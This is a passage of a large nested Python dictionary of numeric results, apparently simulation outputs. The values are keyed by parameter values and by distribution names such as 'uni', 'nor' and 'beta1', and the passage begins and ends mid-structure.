0.07622969912474264, 'beta4': 0.03006036248745808}, 500: {'uni': 0.04689196532878104, 'nor': 0.09593657648017129, 'beta1': 0.04503241099014954, 'beta2': 0.08323295043032963, 'beta4': 0.03714881820594479}, 400: {'uni': 0.051774246404964364, 'nor': 0.09916078860193034, 'beta1': 0.0505571321231062, 'beta2': 0.08730017553432268, 'beta4': 0.04159182778940329}, 300: {'uni': 0.059150975430708325, 'nor': 0.10379530845713192, 'beta1': 0.05822224483584626, 'beta2': 0.09363761776791535, 'beta4': 0.04832173433265907}, 200: {'uni': 0.0716859637391355, 'nor': 0.11234734351192865, 'beta1': 0.07094419045693312, 'beta2': 
0.10324004723700275, 'beta4': 0.059980305787279864}, 150: {'uni': 0.08266517102902693, 'nor': 0.12043265249847296, 'beta1': 0.08183417503139817, 'beta2': 0.11217584960878624, 'beta4': 0.07046469195355531}, 100: {'uni': 0.10054768121870128, 'nor': 0.13395983977474127, 'beta1': 0.09972911370096887, 'beta2': 0.12640535172959536, 'beta4': 0.08769745435863463}, 75: {'uni': 0.11506440143566307, 'nor': 0.1461475325877074, 'beta1': 0.11504294118932046, 'beta2': 0.1391005160652219, 'beta4': 0.10257774239474937}, 50: {'uni': 0.1405096759295903, 'nor': 0.16839269038201765, 'beta1': 0.13993583438148083, 'beta2': 0.16161227714177773, 'beta4': 0.12805930575607483}, 30: {'uni': 0.18017995907272144, 'nor': 0.20200364133487392, 'beta1': 0.18055279602385688, 'beta2': 0.19608371098558458, 'beta4': 0.1683674379324781}, 20: {'uni': 0.21805138604748409, 'nor': 0.23779035600849233, 'beta1': 0.21986203616531452, 'beta2': 0.23327926081944855, 'beta4': 0.2082804112449691}, 10: {'uni': 0.3040705295399263, 'nor': 0.32031549693696865, 'beta1': 0.3066804021631311, 'beta2': 0.31327311772302824, 'beta4': 0.2972068392863597}}, 30: {1000: {'uni': 0.03871017016879641, 'nor': 0.11049883217909062, 'beta1': 0.032247812148711405, 'beta2': 0.0805454176845462, 'beta4': 0.02559841016582587}, 750: {'uni': 0.042769108003219106, 'nor': 0.11296398305504446, 'beta1': 0.03699026418458462, 'beta2': 0.08466666160065073, 'beta4': 0.02979787689834079}, 500: {'uni': 0.04978362867791797, 'nor': 0.11784520617150873, 'beta1': 0.045160080333170705, 'beta2': 0.09071832655647427, 'beta4': 0.03657944795279622}, 400: {'uni': 0.054244251799578425, 'nor': 0.120664612299139, 'beta1': 0.05055449392108258, 'beta2': 0.09478104392591502, 'beta4': 0.041067052741879134}, 300: {'uni': 0.06146708324946404, 'nor': 0.12458558674066761, 'beta1': 0.05823153766200054, 'beta2': 0.10042052998914, 'beta4': 0.04754493134712555}, 200: {'uni': 0.07360874613430221, 'nor': 0.1329409951894065, 'beta1': 0.0712112137494094, 'beta2': 
0.11080986220563926, 'beta4': 0.05867823822711815}, 150: {'uni': 0.08397023944800297, 'nor': 0.1390438256951947, 'beta1': 0.08237631752937374, 'beta2': 0.11918607548226523, 'beta4': 0.06866317554335899}, 100: {'uni': 0.10128809169151631, 'nor': 0.1517267646035071, 'beta1': 0.09972424769262522, 'beta2': 0.1354500191068707, 'beta4': 0.0849190667878878}, 75: {'uni': 0.11597845714700927, 'nor': 0.16309000570623827, 'beta1': 0.11559498237300614, 'beta2': 0.14589154324925346, 'beta4': 0.0999162933165636}, 50: {'uni': 0.14069800262255838, 'nor': 0.1839187462219669, 'beta1': 0.13981209728742372, 'beta2': 0.16778239734387568, 'beta4': 0.12425346462613163}, 30: {'uni': 0.1797446733169624, 'nor': 0.21644972902621398, 'beta1': 0.18059243359809551, 'beta2': 0.20202152261026132, 'beta4': 0.1636678723512469}, 20: {'uni': 0.21937480663500575, 'nor': 0.2497527953300106, 'beta1': 0.21979044357993877, 'beta2': 0.2359411650840486, 'beta4': 0.20332953036428597}, 10: {'uni': 0.30351794338910415, 'nor': 0.329349286588422, 'beta1': 0.3059412686044445, 'beta2': 0.31726353751068403, 'beta4': 0.291909252822552}}, 20: {1000: {'uni': 0.04786473758448062, 'nor': 0.13448854973910773, 'beta1': 0.0474900351548871, 'beta2': 0.09274155108383075, 'beta4': 0.025530278131800782}, 750: {'uni': 0.05039616783397134, 'nor': 0.135064704569215, 'beta1': 0.04765005160770225, 'beta2': 0.09674441211509341, 'beta4': 0.029683541983339667}, 500: {'uni': 0.05547762205023854, 'nor': 0.14001720599630382, 'beta1': 0.048106962180010204, 'beta2': 0.09953924927118829, 'beta4': 0.036370817128490524}, 400: {'uni': 0.05974197156622235, 'nor': 0.14172064957995056, 'beta1': 0.050872352437056095, 'beta2': 0.10418161630558852, 'beta4': 0.040764857091411755}, 300: {'uni': 0.06524051543131026, 'nor': 0.14595220600119096, 'beta1': 0.05848865491478826, 'beta2': 0.10998005813512912, 'beta4': 0.04701701027264421}, 200: {'uni': 0.0770744511637107, 'nor': 0.1547803767946513, 'beta1': 0.07133133392276658, 'beta2': 0.12003921068285384, 
'beta4': 0.05833256338473064}, 150: {'uni': 0.08698214434451997, 'nor': 0.15954648186161546, 'beta1': 0.08183176545570486, 'beta2': 0.12777944293922183, 'beta4': 0.0675035999630012}, 100: {'uni': 0.10375409883656361, 'nor': 0.17061333037285303, 'beta1': 0.10022434196661106, 'beta2': 0.14179923508732106, 'beta4': 0.08374673612833905}, 75: {'uni': 0.11797678653950688, 'nor': 0.18236373219061275, 'beta1': 0.11557026107752538, 'beta2': 0.15377848750968914, 'beta4': 0.09757004251626233}, 50: {'uni': 0.14172731535262179, 'nor': 0.20038698791993043, 'beta1': 0.14046926902337709, 'beta2': 0.1743686159633676, 'beta4': 0.12110025961019322}, 30: {'uni': 0.18039349397749566, 'nor': 0.23067978968795344, 'beta1': 0.18045976448956377, 'beta2': 0.2072893207928338, 'beta4': 0.1592884038412401}, 20: {'uni': 0.21805931381049123, 'nor': 0.2651676956522234, 'beta1': 0.2177278691596758, 'beta2': 0.24147576401840687, 'beta4': 0.19939491723223757}, 10: {'uni': 0.30440975524739855, 'nor': 0.3384425023063676, 'beta1': 0.30324741022916285, 'beta2': 0.3185465132986438, 'beta4': 0.28767747944269173}}, 10: {1000: {'uni': 0.07946518628481158, 'nor': 0.19045003908328084, 'beta1': 0.08877611003813457, 'beta2': 0.1215657503670089, 'beta4': 0.025503535463525406}, 750: {'uni': 0.08130748653818165, 'nor': 0.19076450111902787, 'beta1': 0.0888890045454918, 'beta2': 0.1243044166371681, 'beta4': 0.02964909526636217}, 500: {'uni': 0.0836110010994472, 'nor': 0.19475368394850967, 'beta1': 0.08883318435651434, 'beta2': 0.12587466253680676, 'beta4': 0.03601840756954122}, 400: {'uni': 0.08549487851383872, 'nor': 0.19779586035735008, 'beta1': 0.08896831846511888, 'beta2': 0.12932758634367436, 'beta4': 0.040363816396343344}, 300: {'uni': 0.08877082904027409, 'nor': 0.20230056685424241, 'beta1': 0.0892045849308271, 'beta2': 0.1336762783031652, 'beta4': 0.046694189532298924}, 200: {'uni': 0.09521605691554982, 'nor': 0.20745003836138798, 'beta1': 0.09002076182309414, 'beta2': 0.14011661109027673, 'beta4': 
0.057187663505482156}, 150: {'uni': 0.10136020236794296, 'nor': 0.21186943326805385, 'beta1': 0.09104611326846368, 'beta2': 0.1473809348866521, 'beta4': 0.06636195162267067}, 100: {'uni': 0.11533493817169593, 'nor': 0.22268646748177195, 'beta1': 0.10124550813275801, 'beta2': 0.1601077268001888, 'beta4': 0.08126272311296007}, 75: {'uni': 0.1269965695852332, 'nor': 0.23055614273483438, 'beta1': 0.11618044158873528, 'beta2': 0.16938005363200836, 'beta4': 0.09468104187919912}, 50: {'uni': 0.14865284782727461, 'nor': 0.24696834892452627, 'beta1': 0.1404127307767683, 'beta2': 0.18957960935246276, 'beta4': 0.1167721820183078}, 30: {'uni': 0.184923823116925, 'nor': 0.27382056048837045, 'beta1': 0.17891559108637778, 'beta2': 0.22039797844074127, 'beta4': 0.15358516539031264}, 20: {'uni': 0.22119035292803724, 'nor': 0.304517491178646, 'beta1': 0.21765673628337645, 'beta2': 0.2524910203909854, 'beta4': 0.19029690570897123}, 10: {'uni': 0.3023407524707935, 'nor': 0.3728834325973778, 'beta1': 0.3009333240399166, 'beta2': 0.3231264581550173, 'beta4': 0.2754491139259927}}}, 0.3: {1000: {1000: {'uni': 0.030570556366491086, 'nor': 0.036289126652867154, 'beta1': 0.030583281607816093, 'beta2': 0.04730099054512937, 'beta4': 0.027928049313802772}, 750: {'uni': 0.03530316336772765, 'nor': 0.039975128387633396, 'beta1': 0.03548791254752648, 'beta2': 0.04903397020548944, 'beta4': 0.03276890983776548}, 500: {'uni': 0.04335100802104869, 'nor': 0.047243089590878945, 'beta1': 0.04320767542248788, 'beta2': 0.05406062302488723, 'beta4': 0.04082881841396535}, 400: {'uni': 0.048281092293393224, 'nor': 0.05205613503513076, 'beta1': 0.04839219227783753, 'beta2': 0.05736812647420142, 'beta4': 0.04577289803172907}, 300: {'uni': 0.05576437362285486, 'nor': 0.058754859846003094, 'beta1': 0.05561895544923556, 'beta2': 0.06376771212789967, 'beta4': 0.0536396672811823}, 200: {'uni': 0.06807572111096638, 'nor': 0.07039249496628318, 'beta1': 0.06817615907229235, 'beta2': 0.07430836655124429, 'beta4': 
0.066284048834367}, 150: {'uni': 0.07830726923539255, 'nor': 0.08091810478755601, 'beta1': 0.07807558772859324, 'beta2': 0.08365151347909958, 'beta4': 0.07647958259852394}, 100: {'uni': 0.09565657848301334, 'nor': 0.0981123740412867, 'beta1': 0.09587885037300997, 'beta2': 0.10003610046247435, 'beta4': 0.09378950313692502}, 75: {'uni': 0.10998073605007008, 'nor': 0.11214689636427033, 'beta1': 0.11019075143205581, 'beta2': 0.11354410085085964, 'beta4': 0.10847644171113585}, 50: {'uni': 0.13428431589627038, 'nor': 0.1352778263583828, 'beta1': 0.1339667315839076, 'beta2': 0.1367603615159646, 'beta4': 0.13324126975406497}, 30: {'uni': 0.17274539443709994, 'nor': 0.17277197187209536, 'beta1': 0.17259686934288682, 'beta2': 0.17455077451940057, 'beta4': 0.17209316662270396}, 20: {'uni': 0.20849017587916696, 'nor': 0.21018909590633755, 'beta1': 0.20978229440378748, 'beta2': 0.210556894106393, 'beta4': 0.20983525727222768}, 10: {'uni': 0.2922169330616662, 'nor': 0.29235515396060796, 'beta1': 0.2914316509769965, 'beta2': 0.29365520324231675, 'beta4': 0.2918719921765267}}, 750: {1000: {'uni': 0.03059448158059208, 'nor': 0.037494550974039864, 'beta1': 0.03057665642636398, 'beta2': 0.04757089622996813, 'beta4': 0.027541558054662435}, 750: {'uni': 0.03510618818786626, 'nor': 0.04119138451985416, 'beta1': 0.03541571187769252, 'beta2': 0.04928902750824704, 'beta4': 0.03230008384262106}, 500: {'uni': 0.0431773659571921, 'nor': 0.048603218782619584, 'beta1': 0.043287997446947, 'beta2': 0.0546730633316056, 'beta4': 0.04048647809949074}, 400: {'uni': 0.04824116558225555, 'nor': 0.05321843834621287, 'beta1': 0.048199305013701704, 'beta2': 0.05800775236698885, 'beta4': 0.04530463746309643}, 300: {'uni': 0.05540518670798833, 'nor': 0.05982198884996326, 'beta1': 0.05567771562072299, 'beta2': 0.06397030785670665, 'beta4': 0.053117582056761314}, 200: {'uni': 0.06772031378900262, 'nor': 0.07116110493731592, 'beta1': 0.06816649733957653, 'beta2': 0.07445014600178901, 'beta4': 
0.06569301339546207}, 150: {'uni': 0.07825718715284269, 'nor': 0.08109665950539868, 'beta1': 0.0781046497986293, 'beta2': 0.08456066993421218, 'beta4': 0.0760047555558192}, 100: {'uni': 0.09560224022937375, 'nor': 0.09783638693011121, 'beta1': 0.09584895290202361, 'beta2': 0.10104976356957773, 'beta4': 0.0933672980698591}, 75: {'uni': 0.11025701077751521, 'nor': 0.11241322058286463, 'beta1': 0.11027559531133363, 'beta2': 0.1146920311954221, 'beta4': 0.10829053112713038}, 50: {'uni': 0.1348035578662452, 'nor': 0.13548682039682758, 'beta1': 0.13551492026149686, 'beta2': 0.13742355171140241, 'beta4': 0.13319685684134053}, 30: {'uni': 0.17183186657209226, 'nor': 0.17337212860618245, 'beta1': 0.17194526495477658, 'beta2': 0.17514496328394213, 'beta4': 0.17170411964854926}, 20: {'uni': 0.20996377678372924, 'nor': 0.21037655192180804, 'beta1': 0.2091953390508008, 'beta2': 0.21268253320487945, 'beta4': 0.20887454279336315}, 10: {'uni': 0.2925813013469445, 'nor': 0.2934970209180323, 'beta1': 0.2903843227554898, 'beta2': 0.292154024055348, 'beta4': 0.29025052699691306}}, 500: {1000: {'uni': 0.030652753404500244, 'nor': 0.04025690717821617, 'beta1': 0.030458725319031765, 'beta2': 0.049452523707565255, 'beta4': 0.026981460357740128}, 750: {'uni': 0.035255881858022864, 'nor': 0.04408262087996018, 'beta1': 0.03533505950722848, 'beta2': 0.05114773735578226, 'beta4': 0.031654754917049166}, 500: {'uni': 0.04332946212438382, 'nor': 0.050711888523930104, 'beta1': 0.043188647812777536, 'beta2': 0.056694190819294554, 'beta4': 0.03937922946595157}, 400: {'uni': 0.048011092268698596, 'nor': 0.055004776506215936, 'beta1': 0.04817813554171174, 'beta2': 0.06059305610807844, 'beta4': 0.04451593078130045}, 300: {'uni': 0.05595247678173959, 'nor': 0.06136644245697265, 'beta1': 0.05542281776135362, 'beta2': 0.06619403671726683, 'beta4': 0.05220515153028432}, 200: {'uni': 0.06793933725045043, 'nor': 0.072898052813477, 'beta1': 0.067644332252282, 'beta2': 0.07738699602692958, 'beta4': 
0.06489369991242622}, 150: {'uni': 0.07828090175002178, 'nor': 0.08301359537151642, 'beta1': 0.07815202804646415, 'beta2': 0.08680541880550621, 'beta4': 0.07563081329347063}, 100: {'uni': 0.09519553412075393, 'nor': 0.09944204457595673, 'beta1': 0.09607238042455157, 'beta2': 0.10213640052628101, 'beta4': 0.09308677814519356}, 75: {'uni': 0.10987316808535197, 'nor': 0.11376703529598509, 'beta1': 0.11023390350368756, 'beta2': 0.11604916566241219, 'beta4': 0.10758493316270056}, 50: {'uni': 0.13478443657887695, 'nor': 0.13740298760950306, 'beta1': 0.13406829393670033, 'beta2': 0.13903979048229387, 'beta4': 0.13262398989576224}, 30: {'uni': 0.17197956239052636, 'nor': 0.17432046908514903, 'beta1': 0.17182749783377138, 'beta2': 0.1754950827809304, 'beta4': 0.17133978839693642}, 20: {'uni': 0.2092323475175519, 'nor': 0.2121086324057767, 'beta1': 0.20789680345483424, 'beta2': 0.21277241600873145, 'beta4': 0.20863390282366368}, 10: {'uni': 0.2917818325981677, 'nor': 0.29390261172986865, 'beta1': 0.29469106553609536, 'beta2': 0.2925795869784428, 'beta4': 0.29103683472752606}}, 400: {1000: {'uni': 0.030479441749132086, 'nor': 0.04242546169128053, 'beta1': 0.030684562640612367, 'beta2': 0.04928918568341689, 'beta4': 0.026564469238728072}, 750: {'uni': 0.035330745692963184, 'nor': 0.045726585835036526, 'beta1': 0.035249379001672465, 'beta2': 0.051449055827561985, 'beta4': 0.031085761627238417}, 500: {'uni': 0.04298425565078945, 'nor': 0.05219112197292464, 'beta1': 0.04291699141997607, 'beta2': 0.05671446941827829, 'beta4': 0.03879788587172339}, 400: {'uni': 0.04841156712913064, 'nor': 0.0567067838815154, 'beta1': 0.04826292059676973, 'beta2': 0.06080155637236173, 'beta4': 0.04387502981511732}, 300: {'uni': 0.05551848242038693, 'nor': 0.06314336913027119, 'beta1': 0.055995408019056725, 'beta2': 0.06670707901265915, 'beta4': 0.05161729197545491}, 200: {'uni': 0.06753280207209278, 'nor': 0.07418549342747993, 'beta1': 0.06780632083464455, 'beta2': 0.07849742855872144, 'beta4': 
0.06417277685422138}, 150: {'uni': 0.07892131000767688, 'nor': 0.08428480798230137, 'beta1': 0.07802952658645362, 'beta2': 0.08721266316087362, 'beta4': 0.07509578556966912}, 100: {'uni': 0.09561040817701183, 'nor': 0.10046283966596203, 'beta1': 0.09553795639618262, 'beta2': 0.10295978967769193, 'beta4': 0.09309270468588221}, 75: {'uni': 0.10996879959002176, 'nor': 0.11403749710690919, 'beta1': 0.10970089630785607, 'beta2': 0.11687400266180792, 'beta4': 0.10767273652342291}, 50: {'uni': 0.1341573935423448, 'nor': 0.13750721156433715, 'beta1': 0.13357309262133255, 'beta2': 0.139422581194317, 'beta4': 0.13196955935935817}, 30: {'uni': 0.1719839698851492, 'nor': 0.17517615589326285, 'beta1': 0.171936226302963, 'beta2': 0.1757297703717665, 'beta4': 0.17054913647066844}, 20: {'uni': 0.20962568415417043, 'nor': 0.21093017482022178, 'beta1': 0.2109531327417335, 'beta2': 0.2124421410702677, 'beta4': 0.20866942953199907}, 10: {'uni': 0.2915846887153032, 'nor': 0.29318333013550635, 'beta1': 0.29230277183835673, 'beta2': 0.2935460494777875, 'beta4': 0.28943585016669493}}, 300: {1000: {'uni': 0.03073870905118381, 'nor': 0.0453721867186922, 'beta1': 0.030539757310093174, 'beta2': 0.051014128266916536, 'beta4': 0.02630816348221443}, 750: {'uni': 0.03527707956428239, 'nor': 0.04863496689192515, 'beta1': 0.03535272337640838, 'beta2': 0.05309247098188674, 'beta4': 0.030847740239343002}, 500: {'uni': 0.043103093119915115, 'nor': 0.05537548898945838, 'beta1': 0.043192985581247845, 'beta2': 0.05832301347306265, 'beta4': 0.03827598384084602}, 400: {'uni': 0.048262357386229554, 'nor': 0.05896990305419164, 'beta1': 0.048041282307002886, 'beta2': 0.06273926833030019, 'beta4': 0.04347619692280544}, 300: {'uni': 0.05560700720185019, 'nor': 0.06551918373036114, 'beta1': 0.05595087210581695, 'beta2': 0.07079250726314845, 'beta4': 0.050855969461618744}, 200: {'uni': 0.06812841845448789, 'nor': 0.07631719062877812, 'beta1': 0.06791089524731492, 'beta2': 0.08017905748846188, 'beta4': 
0.0633369247159101}, 150: {'uni': 0.07810976084211943, 'nor': 0.08571298221651569, 'beta1': 0.07824014285292191, 'beta2': 0.08865175294154615, 'beta4': 0.07411587643546858}, 100: {'uni': 0.09592845950854673, 'nor': 0.10235667303102258, 'beta1': 0.09560853089329824, 'beta2': 0.10410221530439875, 'beta4': 0.09145854216968004}, 75: {'uni': 0.11015610349253213, 'nor': 0.1161051824359548, 'beta1': 0.10967509979155243, 'beta2': 0.11812739483956008, 'beta4': 0.10661075747218696}, 50: {'uni': 0.13390288180005772, 'nor': 0.13883954661488274, 'beta1': 0.13467234949737394, 'beta2': 0.14042225887719018, 'beta4': 0.13136625179037467}, 30: {'uni': 0.1724189791803339, 'nor': 0.17610514891945817, 'beta1': 0.1721264669585005, 'beta2': 0.17732195199566786, 'beta4': 0.16928963468833258}, 20: {'uni': 0.20941682201461762, 'nor': 0.21215745594224503, 'beta1': 0.209618043392665, 'beta2': 0.21371395755354405, 'beta4': 0.20720457780049284}, 10: {'uni': 0.29136573039108826, 'nor': 0.2953533906937393, 'beta1': 0.2915141637355504, 'beta2': 0.2947095663135966, 'beta4': 0.289661443618565}}, 200: {1000: {'uni': 0.03064984686392691, 'nor': 0.05043451860288389, 'beta1': 0.03064869204617815, 'beta2': 0.05363856162776437, 'beta4': 0.025837623182089042}, 750: {'uni': 0.035114470743031645, 'nor': 0.053636498003354405, 'beta1': 0.03554354970773452, 'beta2': 0.05641494858720919, 'beta4': 0.030228871955573333}, 500: {'uni': 0.04344683479356848, 'nor': 0.05942737801622866, 'beta1': 0.043048920849664496, 'beta2': 0.06112458005245336, 'beta4': 0.037499090398733725}, 400: {'uni': 0.04819713799051478, 'nor': 0.06309225457944956, 'beta1': 0.04838699880676922, 'beta2': 0.06781833446638641, 'beta4': 0.0425087448681592}, 300: {'uni': 0.05572898393078207, 'nor': 0.06952530258059553, 'beta1': 0.05570841382179792, 'beta2': 0.07285768572268875, 'beta4': 0.049575966762646265}, 200: {'uni': 0.06807383659418853, 'nor': 0.0801618017819507, 'beta1': 0.06801333859302938, 'beta2': 0.08234805993218725, 'beta4': 
0.062140022551191165}, 150: {'uni': 0.07824711164133136, 'nor': 0.08923127184269253, 'beta1': 0.07883741776826814, 'beta2': 0.09251067651440004, 'beta4': 0.07291587380406012}, 100: {'uni': 0.09560431314077711, 'nor': 0.10450815715126349, 'beta1': 0.09567404787638834, 'beta2': 0.10773887846339109, 'beta4': 0.0902075650584725}, 75: {'uni': 0.10977650182622334, 'nor': 0.11816618106678134, 'beta1': 0.1102669991197075, 'beta2': 0.12049187221799695, 'beta4': 0.1048324984984148}, 50: {'uni': 0.1343039124732452, 'nor': 0.14086250431567415, 'beta1': 0.13455177937493012, 'beta2': 0.14203349915576058, 'beta4': 0.1302572093652935}, 30: {'uni': 0.1724479563898607, 'nor': 0.1782054960600049, 'beta1': 0.1720655432067857, 'beta2': 0.1780270710205825, 'beta4': 0.16818233155276918}, 20: {'uni': 0.2093785331688025, 'nor': 0.2140572740180554, 'beta1': 0.21029145111991537, 'beta2': 0.21456930963381293, 'beta4': 0.20682532198274484}, 10: {'uni': 0.29202855251861926, 'nor': 0.2954659784755673, 'beta1': 0.292463352998359, 'beta2': 0.2955290443845223, 'beta4': 0.2887217045817}}, 150: {1000: {'uni': 0.030838216779515926, 'nor': 0.055018265206959294, 'beta1': 0.030517843339180506, 'beta2': 0.05608372418016283, 'beta4': 0.025431929019819777}, 750: {'uni': 0.035362123917898614, 'nor': 0.058457030173542646, 'beta1': 0.03537517904333426, 'beta2': 0.058769180918217145, 'beta4': 0.029837989943044763}, 500: {'uni': 0.043213922318430464, 'nor': 0.06424368163594418, 'beta1': 0.04316681258670646, 'beta2': 0.06710587272080526, 'beta4': 0.03703364619373262}, 400: {'uni': 0.04833376337863218, 'nor': 0.06756792606856232, 'beta1': 0.04799783573268496, 'beta2': 0.07039870056739572, 'beta4': 0.041724718744219014}, 300: {'uni': 0.05586146681024584, 'nor': 0.07329310314756038, 'beta1': 0.05529638444154705, 'beta2': 0.07558336097154274, 'beta4': 0.04886164431709525}, 200: {'uni': 0.06794570035955794, 'nor': 0.08378073139649633, 'beta1': 0.06823928564341947, 'beta2': 0.0860472972006906, 'beta4': 
0.06117936529617951}, 150: {'uni': 0.07839758781878625, 'nor': 0.09231986974590034, 'beta1': 0.07844421422032721, 'beta2': 0.09371209848751239, 'beta4': 0.07131228351352475}, 100: {'uni': 0.09586975657519081, 'nor': 0.10714675207140412, 'beta1': 0.09559347574817811, 'beta2': 0.11002902848994539, 'beta4': 0.08959146899533599}, 75: {'uni': 0.11010826171433234, 'nor': 0.12126074477384846, 'beta1': 0.10990930848644964, 'beta2': 0.12178803610217631, 'beta4': 0.10380949345486348}, 50: {'uni': 0.1343214298555367, 'nor': 0.14247203802994213, 'beta1': 0.13385227759189416, 'beta2': 0.14299792348234408, 'beta4': 0.12836902924407073}, 30: {'uni': 0.1725778251785654, 'nor': 0.17826765858321283, 'beta1': 0.17232850345099437, 'beta2': 0.17902665877961377, 'beta4': 0.16804486300951366}, 20: {'uni': 0.20923828034878794, 'nor': 0.21505427759471324, 'beta1': 0.20947316437016195, 'beta2': 0.21556344537944894, 'beta4': 0.205296822907456}, 10: {'uni': 0.2912969465283485, 'nor': 0.29786616175121944, 'beta1': 0.2921180556905318, 'beta2': 0.2942536240063773, 'beta4': 0.28867921289925763}}, 100: {1000: {'uni': 0.031072383442646623, 'nor': 0.06286992752019249, 'beta1': 0.030625891912101244, 'beta2': 0.05879416691552142, 'beta4': 0.025203295860677627}, 750: {'uni': 0.03580272688057862, 'nor': 0.06614015652523586, 'beta1': 0.035330967643673494, 'beta2': 0.06164117508809697, 'beta4': 0.029546455172328512}, 500: {'uni': 0.04347491725851127, 'nor': 0.07103887819755894, 'beta1': 0.04288278858954275, 'beta2': 0.06950563628146106, 'beta4': 0.036250627429170346}, 400: {'uni': 0.04841725320908952, 'nor': 0.07515276106744045, 'beta1': 0.048207874825495156, 'beta2': 0.07281441955053547, 'beta4': 0.04106938703316515}, 300: {'uni': 0.05581361792803008, 'nor': 0.0804344767904921, 'beta1': 0.05549497359097222, 'beta2': 0.07860014494562395, 'beta4': 0.04816835176472789}, 200: {'uni': 0.0680104028224871, 'nor': 0.0899287719835754, 'beta1': 0.06768158716081898, 'beta2': 0.08861735552692984, 'beta4': 
0.059838070085047684}, 150: {'uni': 0.07830299427203302, 'nor': 0.09823952555336729, 'beta1': 0.0781938574456082, 'beta2': 0.09864482170689659, 'beta4': 0.07000041446264826}, 100: {'uni': 0.09572762933073209, 'nor': 0.11370380350455811, 'beta1': 0.09588982413073177, 'beta2': 0.11254326539068987, 'beta4': 0.0872727084042092}, 75: {'uni': 0.10972174136249069, 'nor': 0.1261032950814237, 'beta1': 0.10998724073974103, 'beta2': 0.1250175630115139, 'beta4': 0.10149116692916582}, 50: {'uni': 0.1346226891470239, 'nor': 0.1474470477708189, 'beta1': 0.13398284073629363, 'beta2': 0.14605045540182798, 'beta4': 0.12656776186643182}, 30: {'uni': 0.171289729627625, 'nor': 0.18300803860826304, 'beta1': 0.17197133058640537, 'beta2': 0.18045847672308146, 'beta4': 0.16615899142928847}, 20: {'uni': 0.20948265436898134, 'nor': 0.21820996754149108, 'beta1': 0.2083154616981402, 'beta2': 0.21682018217589444, 'beta4': 0.20368889712319002}, 10: {'uni': 0.29332092603556315, 'nor': 0.29884771959554113, 'beta1': 0.2928639451085291, 'beta2': 0.29596957653109623, 'beta4': 0.287993475210005}}, 75: {1000: {'uni': 0.03154718546267052, 'nor': 0.07044763487600164, 'beta1': 0.030523906995489347, 'beta2': 0.06095775037531781, 'beta4': 0.025178612703061598}, 750: {'uni': 0.03587641128641306, 'nor': 0.07299193497447859, 'beta1': 0.035281289240443936, 'beta2': 0.06385369106198494, 'beta4': 0.029127736955950057}, 500: {'uni': 0.04391766277410497, 'nor': 0.07813329575242478, 'beta1': 0.04340596642353545, 'beta2': 0.07179729219122671, 'beta4': 0.036086430090033816}, 400: {'uni': 0.048844097708170386, 'nor': 0.08183669421171236, 'beta1': 0.04807797399750002, 'beta2': 0.07521514498858767, 'beta4': 0.04049563308356163}, 300: {'uni': 0.0559940480059955, 'nor': 0.08609350845523445, 'beta1': 0.055831745197134575, 'beta2': 0.0826010220686782, 'beta4': 0.04713573528154402}, 200: {'uni': 0.0683453076733273, 'nor': 0.09540815213423537, 'beta1': 0.06790338184860889, 'beta2': 0.09158709481883592, 'beta4': 
0.059111816398762285}, 150: {'uni': 0.07844185085801125, 'nor': 0.10391542371009366, 'beta1': 0.07831073142916842, 'beta2': 0.10032168899848526, 'beta4': 0.06888011570999455}, 100: {'uni': 0.09594855642525024, 'nor': 0.11746142695193407, 'beta1': 0.09516113565651263, 'beta2': 0.11488209132926885, 'beta4': 0.08612950477373915}, 75: {'uni': 0.10978056964178606, 'nor': 0.13039658706335377, 'beta1': 0.11037351197141043, 'beta2': 0.12760478930659974, 'beta4': 0.10050946376158554}, 50: {'uni': 0.1342077394648763, 'nor': 0.15134188483531175, 'beta1': 0.13361807973321893, 'beta2': 0.14895024123184664, 'beta4': 0.1248108548205345}, 30: {'uni': 0.17154364522069487, 'nor': 0.18473249458088753, 'beta1': 0.17248033985600267, 'beta2': 0.18331185817811452, 'beta4': 0.16423432417184547}, 20: {'uni': 0.20782941225027318, 'nor': 0.22146906910281994, 'beta1': 0.209751594461421, 'beta2': 0.2173162603888529, 'beta4': 0.20159255474557342}, 10: {'uni': 0.291334076187922, 'nor': 0.2992867706784435, 'beta1': 0.29261596744170054, 'beta2': 0.2960163189286691, 'beta4': 0.28524371036426077}}, 50: {1000: {'uni': 0.0329993154562257, 'nor': 0.08207318747113157, 'beta1': 0.030671468325690204, 'beta2': 0.06648424648000095, 'beta4': 0.02488381017609015}, 750: {'uni': 0.03738443452448176, 'nor': 0.08572544936677795, 'beta1': 0.035303282232089284, 'beta2': 0.07002036286325686, 'beta4': 0.028894147053289826}, 500: {'uni': 0.044737763029671695, 'nor': 0.08966708732648676, 'beta1': 0.04340465898409554, 'beta2': 0.07682945882872405, 'beta4': 0.03548424878981277}, 400: {'uni': 0.04937088906781539, 'nor': 0.09281018247408995, 'beta1': 0.04840075745360373, 'beta2': 0.07992875043033376, 'beta4': 0.03972236374485255}, 300: {'uni': 0.056674883766536566, 'nor': 0.09773596053700151, 'beta1': 0.05549753161205717, 'beta2': 0.08714041454214849, 'beta4': 0.04659758746289444}, 200: {'uni': 0.06860153239416655, 'nor': 0.10630954521453767, 'beta1': 0.06793537494136576, 'beta2': 0.09641941459565317, 'beta4': 
0.05784887912329589}, 150: {'uni': 0.0787453526380626, 'nor': 0.11324399916126676, 'beta1': 0.07869495808729748, 'beta2': 0.10493442734242159, 'beta4': 0.06755025538156267}, 100: {'uni': 0.09522502884464878, 'nor': 0.12666649348936998, 'beta1': 0.0955330448453976, 'beta2': 0.11990014749723277, 'beta4': 0.08427352133834594}, 75: {'uni': 0.1100197062263768, 'nor': 0.13833028774850076, 'beta1': 0.10986631872332808, 'beta2': 0.13176370778245594, 'beta4': 0.09870160730848387}, 50: {'uni': 0.13421155841951937, 'nor': 0.15941967086434394, 'beta1': 0.1339691684883051, 'beta2': 0.15279416514019803, 'beta4': 0.12213609394490166}, 30: {'uni': 0.1721102987741357, 'nor': 0.19290136415164644, 'beta1': 0.1729701132110737, 'beta2': 0.18618368178105146, 'beta4': 0.16098989092313043}, 20: {'uni': 0.20807791188346714, 'nor': 0.2270631379617466, 'beta1': 0.20884121198766303, 'beta2': 0.22035377475051882, 'beta4': 0.1999515315854391}, 10: {'uni': 0.28942960019437525, 'nor': 0.30528957184252636, 'beta1': 0.29033509284968895, 'beta2': 0.3002914665011813, 'beta4': 0.2840920174861028}}, 30: {1000: {'uni': 0.03740912638303681, 'nor': 0.1036739698595659, 'beta1': 0.03212037925335687, 'beta2': 0.07451381449879518, 'beta4': 0.024765179813423077}, 750: {'uni': 0.04113538401988681, 'nor': 0.10564716613623504, 'beta1': 0.03524754243631689, 'beta2': 